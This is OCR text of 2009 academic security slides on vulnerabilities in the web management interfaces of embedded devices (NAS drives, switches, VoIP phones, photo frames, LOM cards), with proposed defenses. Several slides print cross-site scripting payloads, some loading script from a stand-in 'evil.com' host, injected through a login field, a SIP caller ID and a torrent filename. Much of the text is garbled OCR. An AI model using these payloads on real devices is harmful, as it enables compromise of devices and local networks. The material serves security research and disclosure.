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Web management interface 



Managing embedded devices via a web interface 
/ Easier for users 
/ Cheaper for vendors 
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Internet 



240M registered domains 
72M active domains 




Hristo Bojinov Elie Bursztein Dan Boneh 



Thursday, July 30, 2009 



Source Netcraft 



Embedded Management Interfaces Emerging Massive Insecurity 



Web security prominence 



Today: 



top server-side issue 
top client-side issue 
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Web application spectrum 
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Popular Internet 
web sites 



Custom 
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Embedded device prominence 



Embedded web applications 
are everywhere 



OOM+WiFi access points 



also in millions of 

switches, printers, 



consumer electronics 




San Francisco WiFi ac 



Source: skyhookwireless 
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Embedded web servers will soon dominate 
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Spectrum revisited 
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Recipe for a disaster 



Vendors build their own web applications 

► Standard web server (sometimes) 

► Custom web application stack 

► Weak web security 



New features/services added at a fast pace 

► Vendors compete on number of services in product 

► Interactions between services •► vulnerabilities 
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Some vendors got it right... 
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Kodak EasyShare digital frame » Settings » General Settings 
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General Settings 



Language: 

Frame Name: 
Automatic resizing: 

USB Connection Mode: 

About 



English ^ 



seclab 
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OOfT 

©Connect to computer 
O Connect to printer 



Frame model number: 
Frame Serial number: 
Firmware version: 
Touch panel version: 



WC20 

KCEJH6331 00632 
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v4.3 
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... almost. 
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You can set up your frame to view multimedia content feeds directly from the Web from sites such as those listed below. 
WeVe setup a few sample feeds to get you started. Click "Add ..."to set up your own. 
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The result 



Vulnerabilities in every device we audited 
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Outline 



Audit methodology: auditing a zoo of devices 

Illustrative attacks 

Defenses and lessons learned 
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Overall audit results 



Hristo Bojinov Elie Bursztein Dan Bone. 



Thursday, July 30, 2009 



imbedded Management Interfaces Emerging Massive Insecurity 



Overall audit results 



8 categories of devices 
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Overall audit results 



8 categories of devices 



6 different brands 
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Overall audit results 



8 categories of devices 



6 different brands 



23 devices 



Hristo Bojinov Elie Bursztein Dan Bone. 



Thursday, July 30, 2009 



imbedded Management Interfaces Emerging Massive Insecurity 



Overall audit results 



8 categories of devices 



6 different brands 



23 devices 

5(M vulnerabilities reported to CERT 
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Attack types 



Popular ones: 

Cross Site Scripting (XSS) 

Cross Site Request Forgeries (CSRF) 



► Cross-Channel Scripting (XCS) attacks 



File security 

User authentication 
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Stored Cross Site Scripting (XSS) illustrated 




D-link DNS-323 

► Allows to share files 

► Configured via Web 
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Stored XSS illustrated 
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Fill a http form 
<script>..</script> 
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Stored XSS illustrated 
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Stored XSS illustrated 
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Attack result 



D-Litl 



DNS-3231 



ADVANCED 



DEVICE INFO 



SETUP 



DEVICE INFORMATION 

View a summary of device information here 



TOOLS 



STATUS 



SUPPORT 



LOGOUT 




IP Address: 192.168.1.103 

Subnet Mask: 255.255.255.0 
Gateway IP Address: 192.168.1.1 

Mac Address: 00:22:80:64:03:68 
DNS1: 171.64.7.55 
DNS2: 171.64.7.121 



DH33= TWWVT3T 

dhsj: iwwvaa 

H3cvqqk&??: 00:55:B0:G^:O3:e8 
smsA ib vqqi-sae: rayiGST 
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Cross Site Request Forgery (CSRF) illustrated 




Netgear FS750T2 

► Intelligent switch 

► Configured via Web 
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CSRF illustrated 
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CSRF illustrated 
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CSRF illustrated 
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CSRF illustrated 




*-' 



^^^ ^^^ ^^^ ^^^ ^^^ ^^^ 
^^^^ ^^^^ ^^w ^^v ^^w ^^^^ 



I Administer the switch 




2 Browse the web 





3 Trigger POST (e.g. via Ads) 
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CSRF illustrated 



4 Forward the bad post request 
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CSRF illustrated 



4 Forward the bad post request 



I Administer the switch 



*-' 



\ tiP ^^ 




2 Browse the web 





3 Trigger POST (e.g. via Ads) 



Hristo Bojinov Elie Bursztein Dan Boneh 



Thursday, July 30, 2009 



Embedded Management Interfaces Emerging Massive Insecurity 



CSRF illustrated 



4 Forward the bad post request 
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Cross Channel Scripting (XCS) illustrated 




LaCie Ethernet disk mini 

► Share access control 

► Web interface 

► Public FTP 
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XCS illustrated 
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Attacker 
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XCS illustrated 
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XCS illustrated 



FTP 
server 




file 
system 



Web 
App 



nas; 



upload the file: 
<script>..</script>.pdf 



Attacker 



reflect the filename: 
<script>..</script>.pdf 



Admin Browser 



Hristo Bojinov Elie Bursztein Dan Boneh 



Thursday, July 30, 2009 



Embedded Management Interfaces Emerging Massive Insecurity 



XCS illustrated 
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Attack result 



Mozilla Firefox 



File Edit View History Bookmarks Tools Help 

T {J jLi* httpn'i /cgi-bin/browse?share= share 




Hello! 



We now own your secret data. For example: 



EDini 




[To Parent Directory] 

U 1/09/ 2000 22:50:05 



7.7k: secret code.exe 



n t v . na 1 , "nnn v 



J2 



1' SF 



acnrKP rnrrcfiyc 
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XCS: cross-channel scripting 
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Devices as stepping stones 




' 9*k 
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Devices as stepping stones 
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Devices as stepping stones 
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Devices as stepping stones 




3 Trigger POST (e.g. via Ads) 
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the device 







Hristo Bojinov Elie Bursztein Dan Boneh 



Thursday, July 30, 2009 



Embedded Management Interfaces Emerging Massive Insecurity 



Devices as stepping stones 




4 infect 
the device 



3 Trigger POST (e.g. via Ads) 
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Devices as stepping stones 




5 access files 
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Devices as stepping stones 




6 Send malicious 
payload 



5 access files 
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Devices as stepping stones 




6 Send malicious 
payload 



5 access files 




7 Attack local 
network 
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Brands 
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NETGEAR 
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Connect with Innovation 
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Vulnerabilities by category 
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Vulnerabilities by category 
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Devices by Brand 
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Attack surface 



Confidentiality 
Integrity 
Availability 
Access control 



Attribution 
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Attack surface result 
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Attack surface result 
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Attack surface result 
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Attack surface result 
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Attack surface result 
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Attack surface result 



Confidentiality 


5 


Steal private data 


1 ntegrity 


22 


Reconfigure device 


Availability 


1 O 


Reboot device 


Access control 


23 


Access files without 
password 


Attribution 


*-*- 


Don't log access 



Hristo Bojinov Elie Bursztein Dan Boneh 



Thursday, July 30, 2009 



Embedded Management Interfaces Emerging Massive Insecurity 




Thursday, July 30, 2009 



Login + Log XSS 



uick warm-uD: LOM 



LOM basics 
Log XSS 
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Login + Log XSS 



LOM basics 



Lights-out recovery, maintenance, inventory tracking 
PCI card and chipset varieties available 

Separate NIC and admin login* 

Low-security default settings 
Motherboard connection 
Usually invisible to OS 




■ 
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Login + Log XSS 



Log XSS 



► Known for a decade 

► Traditionally injected via DNS 

► Also see recent IBM BladeCenter advisory 



http;/ /www. cert.fi/en/reports/2009/vulnerability2 00902 9. html 
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Persistant Log-based XSS 




*&r 
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Persistant Log-based XSS 




*&r 




Attacker attempts to login as user 



" ) ;</script><script src=" //evil. com/ "></script><script> 
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Persistant Log-based XSS 




A0T 




Attacker attempts to login as user 



") ;</script><script src=" //evil. com/ "></script><script> 



2 Admin views syslog 
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Persistant Log-based XSS 




A0T 




Attacker attempts to login as user 



") ;</script><script src=" //evil. com/ "></script><script> 



2 Admin views syslog 




3 Pay load executes 
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Login+Log XSS attack result 



II Remote Access Controller 4/ 



D0LL 



172.24.78.136 



Properties J Logs ~ Configuration Update Diagnostics 
SEL | Last Crash Screen | DRAG 4 Log 



About I Log 



DRAG 4/P @ PL>werEdge S40 
admin, Administrator 



Stanford Security Lab 



B- DRAG 4 

B Power 

B Console 

B Media 
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Cross Channel Scripting (XCS) 



Moving on to real XCS 



VoIP phone 
Photo frame 
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SIP xcs 
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VoIP phone 

► Linksys SPA942 

► Web interface 

► SIP support 

► Call logs 
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SIP xcs 
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SIP xcs 



SIP:xyz@mydomain calls abc@thatdomain 
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SIP xcs 



SIP:xyz@mydomain calls abc@thatdomain 




2 RTP: carries actual binary data 
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SIP xcs 





Hristo Bojinov Elie Bursztein Dan Boneh 



Thursday, July 30, 2009 



Embedded Management Interfaces Emerging Massive Insecurity 



SIP xcs 





Attacker makes a call as 



<script src= " / /evil . com/ " ></ script> 



rr 
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SIP xcs 






Attacker makes a call as 



r C C 

o c C P^ P "<script src= " / /evil . com/ " ></ script> 



f/ 



2 Administrator accesses web interface 




* 
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SIP xcs 







Attacker makes a call as 



r C C 

o c C P^ P "<script src= " / /evil . com/ " ></ script> 



f/ 



2 Administrator accesses web interface 



3 Pa/load executes 
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SIP XCS attack result 



l 



A Division of Cisco Systems, Inc. 



Redial List Answered Calls Missed Calls 



unksy: 



3. 

5. 



^ Part of the page removed to conserve space. 



2. 
4. 
6. 
8. 



53. 
55. 
57. 
59. 



54. 
56. 
53. 
60. 
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Photo frame sales 



The Global Digital Photo Frame Market 
Quarterly Unit Sales (1Q07-4Q08) 



6,000,600 - 









4,DDD r 000 - 




1G0? 



£G0? 



jao? 



4Q07 



IQDfl 



2Q0& 



3008 



4008 



Source: Digital Photo frame Market: Global 2 H 08 Update 
© 2009 Parks Associates 
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Photo frame XCS 
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WiFi photo frame 

► Samsung SPF85V 

► RSS/ URL feed 

► Windows Live 

► WMV/AVI 
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Photo frame XCS 



Fetch photos from the InternetWatch movies too. 
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Photo frame XCS 



Fetch photos from the InternetWatch movies too. 



Operation 

► Use browser interface to set up 

► You can also see the current photo! 

► Many configuration fields: RSS, URLs, etc 
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Photo frame XCS 
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Photo frame XCS 




Attacker infects via CSRF 
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Photo frame XCS 




Attacker infects via CSRF 





2 User connects to manage 
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Photo frame XCS 




Attacker infects via CSRF 





2 User connects to manage 



3 Pay load execute 
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Photo frame XCS attack result 




There is a ghost in here 

Now Playing: bouh.Jpg 




C 



C 






Frame Serial Number: 

Ghost activity report 

injecting pay load 

Stealing the file/image 

File loaded, decoding it 

decode complete, re-encoding 

leaking file 

Ghosting completed, file out] 

Firmware Version: M-CB06S6US-1 001.1 



■ - .«a i 
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Photo frames as stepping stones 
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Photo frames as stepping stones 




i 



Frame gets infected via 
grandma's browser 
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Photo frames as stepping stones 




i 



2 Son connects to 
upload photos 




Frame gets infected via 
grandma's browser 
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Photo frames as stepping stones 




i 




2 Son connects to 
upload photos 





3 Intranet 
infected 



Frame gets infected via 
grandma's browser 
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Photo frame XCS 



Bonus "feature": 
► Current photo visible without login 
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A vehicle for scams? 



eStarling photo frame 

► receive photos via email 

► predictable address 
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Thursday, July 30, 2009 



Big picture 



Embedded web servers are everywhere 

► In homes, offices 

► Various types and functions 

► Massive attack surface (in aggregate) 



► Can be use as stepping stones into LAN 
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Big picture 



Security: not a priority so far 

► Single exploits: well known 

► However, the trend is a concern 
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Big picture 



Security: not a priority so far 

► Single exploits: well known 

► However, the trend is a concern 

► Rise of multi-protocol devices: XCS 

► Rise of browser-OS: 24x7 exploitability 



Hristo Bojinov Elie Bursztein Dan Boneh 



Thursday, July 30, 2009 



Embedded Management Interfaces Emerging Massive Insecurity 




Thursday, July 30, 2009 



Defense approaches 



Today 
► Internal audits by IT staff and end-users 



Hristo Bojinov Elie Bursztein Dan Boneh 



Thursday, July 30, 2009 



Embedded Management Interfaces Emerging Massive Insecurity 



Defense approaches 



Today 
► Internal audits by IT staff and end-users 



Near-term 
► SiteFirewall: IT, browser vendors 
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Defense approaches 



Today 
► Internal audits by IT staff and end-users 



Near-term 
► SiteFirewall: IT, browser vendors 



Long-term 
► Server-side security gains 
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SiteFirewa 



Injected script can issue requests at will 
<script src=" http://evil.com"> 



Before 



IALI 







Coitfkgurali&n ] Network J Disk | Sharas I Users [ Meilui [ Status 



SS 2Q0O-0Z- 11 06:^4 SJ2PM 



Ug Off 



bate Program 

Ja^ 10 D2:1B:43 hnLpil(Faii_anix) [17^76; 

Jon 10 02:16:46 httpd(paii_unix) [1^476] 

Jan 10 02:19:01 ht,tpH(pau_Lniix) [17GI3] 

JftJl 10 QS;*9;<;i5 htWii(|>aiL_UttiK) [17 617] 



Eecsage 

session cpenecL ior usar adsln bv fuLd=C 
scmioh closed for user admin 
bad us emails [^ 
bad useiLftaie [ 



We nor-// cu-n yo_ir secret data. For example: 



EDmini - secret/ 



[To Parent Directory] 

QWQSfiQOO 22:50:P5 



7 7k 5e<:iel_r.otle_eKe 
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SiteFirewa 



SiteFirewall (a Firefox extension), prevents 
internal websites from accessing the Internet. 
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SiteFirewa 



SiteFirewall (a Firefox extension), prevents 
internal websites from accessing the Internet. 
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SiteFirewa 



Page interactions with the Internet blocked. 



After 



lAUE 



I Configuration J Network I Disk I Shares I Users | M*ilui [ Status 



■ ■l'2CCC-02^ J DG:^ 



I ny Off 



Date 

Jan 10 32MB: 43 

Jon 10 02:ie:4e 

Jan 10 02:19:01 

■Jan 10 0S^9;^d 



rioyram 

htup d (pan_unix ) [ 1 7 476 ] l 
httpd(pin_ur.ix) [1^476] ; 
httpd(pan_uiiixj [17613] l 
:-.i ■ j ■ i ■; r ->:■_-! xj [ i^«5i?; : 



Hbeg-cIijib 

session cpeneci lor user adaln fcv fuld=C 
scmioh closed for user admin 
b a 3 usecr_aiiE [ ] 
bal uscl^ojic [ 



| Jon 1 02:1 9:46 nttpd(pam_u™)[1 761 7): bad uosrnanne Jan 1 02:1 9:50 htlpdfpam__ini:<:[1 76"- 8|: 
session opened for usar atirnln by (uid=0) Jan 1 G2:1 9:50 hflpd(pam_unlK}[l 7£ J s;: ■session clcsad Tcr 
i_ser acmin Jan ' 02 1 9:54 Mtpd(pam_unkH1 7664|: session opened for user admin by (uid=0) Jan 1 
C '2 :1 U \bA mtlp d (p a m_ jnixj[l ? 6G 4): a a eei on c Ic s o J lor u 5 sr a d m in Jan 1 D 2: 20: D 1 httpcKoarn_u n &)|1 T ?95] 
session opened fa p i:5er admin by (uid=0) Jan 1 Q 02 20 01 ht1p=d(pam_uni*)[1 77951: legion closed tisr 
user admin Jan 1 02 20:02 httpd(pam_uniK)[1 7947|: bad usernarrc Jai 1 3 02:20 02 httpd(pam_uni>0 
[1 78431: session opened flor user admin by (uid=Q) jan l o 02 so C2 hL:pd(parn_uriis<>[i 7S4B|. sa^ion 
closed for user adnin -_an 1 23:09:40 kernel ?cbaO: link dowr Jar 1 23:09:41 ifplugd(egigaO)[622|: Link 
beal lo si. Jan 1 D 23:08:43 ltplugdKeglgaO)[522] E^etulm^ velc/rfplugdfifp ugladlon eglgao dov'/n". _an 1 
23:09:43 ifrlugd(egig$O)[022] client route SIDC|ADD|DELJ*T: Nc such process^ an 10 23:03:44 
iftcl jcd(cgica0;[622]: Frogram ewecufec SLCccosfully. Jan J 23:1 3:1 2 kernel: egigaO: link up^5^, full 
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Server-side defenses 



Difficulties 

► No standard platform to build for 

► Adding insecure features: unavoidable 
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Server-side defenses 



Difficulties 

► No standard platform to build for 

► Adding insecure features: unavoidable 
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Server-side defenses 



Difficulties 

► No standard platform to build for 

► Adding insecure features: unavoidable 



Requirements 

► Security is a top priority 

► Performance trade-offs possible 

► Architectural trade-offs: kernel vs. web server 
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Server-side defenses 



O pportunities 

► Use captchas 

► Process sandboxing 

► Data storage and access model 
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Server-side defenses 



O pportunities 

► Use captchas 

► Process sandboxing 

► Data storage and access model 



Future work: development framework 

► Secure embedded web applications 

► RoR too heavyweight in this context 
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Another boring NAS device? 




SOHO NAS 

► Buffalo LS-CHL 

► BitTorrent support! 
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Massive exploitation 
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Massive exploitation 



Create a 
bad torrent 





Famous movie. tor rent 
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Massive exploitation 










Hristo Bojinov Elie Bursztein Dan Boneh 



Thursday, July 30, 2009 



Embedded Management Interfaces Emerging Massive Insecurity 



Massive exploitation 










Hristo Bojinov Elie Bursztein Dan Boneh 



Thursday, July 30, 2009 



Embedded Management Interfaces Emerging Massive Insecurity 



Massive exploitation 
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Massive exploitation 
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Peer-to-peer XCS attack result 






Torrent 



Do w nl oa d Unnaopr 



Torrent Downloads 



[ B row se... ] No File Selected 

XCS attack 






UFFAL 




Add 



Start Stop 1 Remove 


Name * 


Size 




Proflr 


+ <ffranw an 1 aad="dccumant.cMtElementBvJdf 'add-ODtlonsl.lnnorHTML = "XCS attack"^ 
2.pdf 




13TJHKB 


i= 







3bqi 
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Conclusion 



► Sticky technology 

► Standardize... 



remote access 



firmware upgrade 
rendering to HTML 
configuration backup 



Thanks to Eric Lovett and Parks Associates! 
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Configuration file XCS 




WiFi router 

► LinksysWRT54G2 

► Standard features 

► Config backup 



Mature technology. 
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Configuration file XCS 
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Configuration file XCS 




Save file 




Configuration 
file 
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Configuration file XCS 





oave me 


_ \ 
















\SL 






Tampering with 


ll 








the file 




Configuration 






file 
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Configuration file XCS 





oave me 


^\ 
















ll 


Tampering with 

thp flip 




Configuration 
file 


LI IC 1 IIC 
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Configuration file XCS 




Save file 



Restore file 




Tampering with 
the file 




Configuration 
file 
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Configuration file XCS attack result 



ol, 






Access 
Restrictions 



Internet Access 



Setup 



Wireless 



Security 



strictions 



Applications 
St Gaming 



Administration 



Version: 1. 



WRT54G2 



Status 



iternet Access 



Internet Access Policy: 



1 [fire wall test) 


Summary 



Status: 

Enter Policy Name: 

PCs: 

Goeny 
Allow 
Days 

Everyday 



Enable O Disable 



firewall test 



Edit List of PCs 



Internet access during selected dav 




□ Sun 

□ TTiu 



□ Mon 

□ FN 



D Tue 
D Sat 



□ Wed 



r^] EASiAqaA 



[J snu 



[J wou 






D ' 






Internet Access Policy: Yi 
may define up to 1 access 
policies. Click Delete to- delet 
policy or Summary to see a 
summary of the policy. 

Status: Enable or disable a 
policy. 

Policy Name: You may assi^ 
a name to your policy. 
More- 



Days: Choose the day of the 
week you would like your po"" 
to be applied. 

Times; Enter the time of the 

J_JIJJS3! £ U|QL ||J S IJUUc- CIJI-I? 

|c pe abbjieq" 
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An easy fix 
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An easy fix 





Sign with a device private key ! 
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An easy fix 





* 




Sign with a device private key ! 
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What about arbitrary file inclusion? 



LriKBta 
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What about arbitrary file inclusion? 
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Compact Wireless-G Internet Video Camera 



Setup 




Basic 



rootS lS\'jqiXiBTSgW0TOYeQ9cKPI8/aAK2wP. 




What about arbitrary file inclusion? 
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Compact Wireless-G Internet Video Camera 



Setup 




Basic 



rootS lS\'jqiXiBTSgW0TOYeQ9cKPI8/aAK2wP. 




More attacks: Switches 



System Setting 

System Name 

Location Name 

Login Tim &out 
(3 -30 minutes) 



asdf2 



3C 



The page at http://192.168.1.103 says: 



IP Address 

O Get Dynamic IP from DHCP Server 
© Static IP Address 

IP address 
Subnet mask 
Gateway 



192 


168 


1 


103 










255 


255 


255 













192 


16& 


1 


1 



! 



OK 



Apply [ Help 



ybb v |_|Ft||> 












Netgear switch 



Trend net switch 



System Information 




System Name 


JEG-SBllFi 


System Description 8 10/100TX + 1 10/100/1000T + 1 MINI-GBIC Managed Switch 


System Location 


las 


System Contact 






Apply Help 



Firmware Version 
Kernel Version 
MAC Address 



vl.01 



vl.61 



0014D1D0A6C1 



HVf vqqLKE 

K<5tU6| A6L?FMI 



■oohdidottcj 
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More attacks: LOM 



Remote Supervisor Adapter II R 



Local: SN# K106088A175 



Monitors 



System Status 



Vital Product Data 

T Tasks 

Power/Restart 
Remote Control 
PXE Network Boot 
Firmware Update 

^ASM Control 

System Settings 
Loom Profiles 



fo4u h tQ ^i sa 



Event Log 

3 Monitor log state events 




Intel vPro/AMT 
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IBM RSA II 



lntel®Active Management Technology 



System Status 
Hardware Information 

System 

Processor 

Memory 

Disk jm 

Battery IP* 

Event Loy 
Remote C 01 itiol 
Powei Policies 
Net iAi oik Settings 
Wheless Settings 
User Accounts 



Wirektt Settings 

Band mode capabilities 
Radio state 



Wireless Management 
Profiles 



ABGN 
Off 

Disabled 



Enable 
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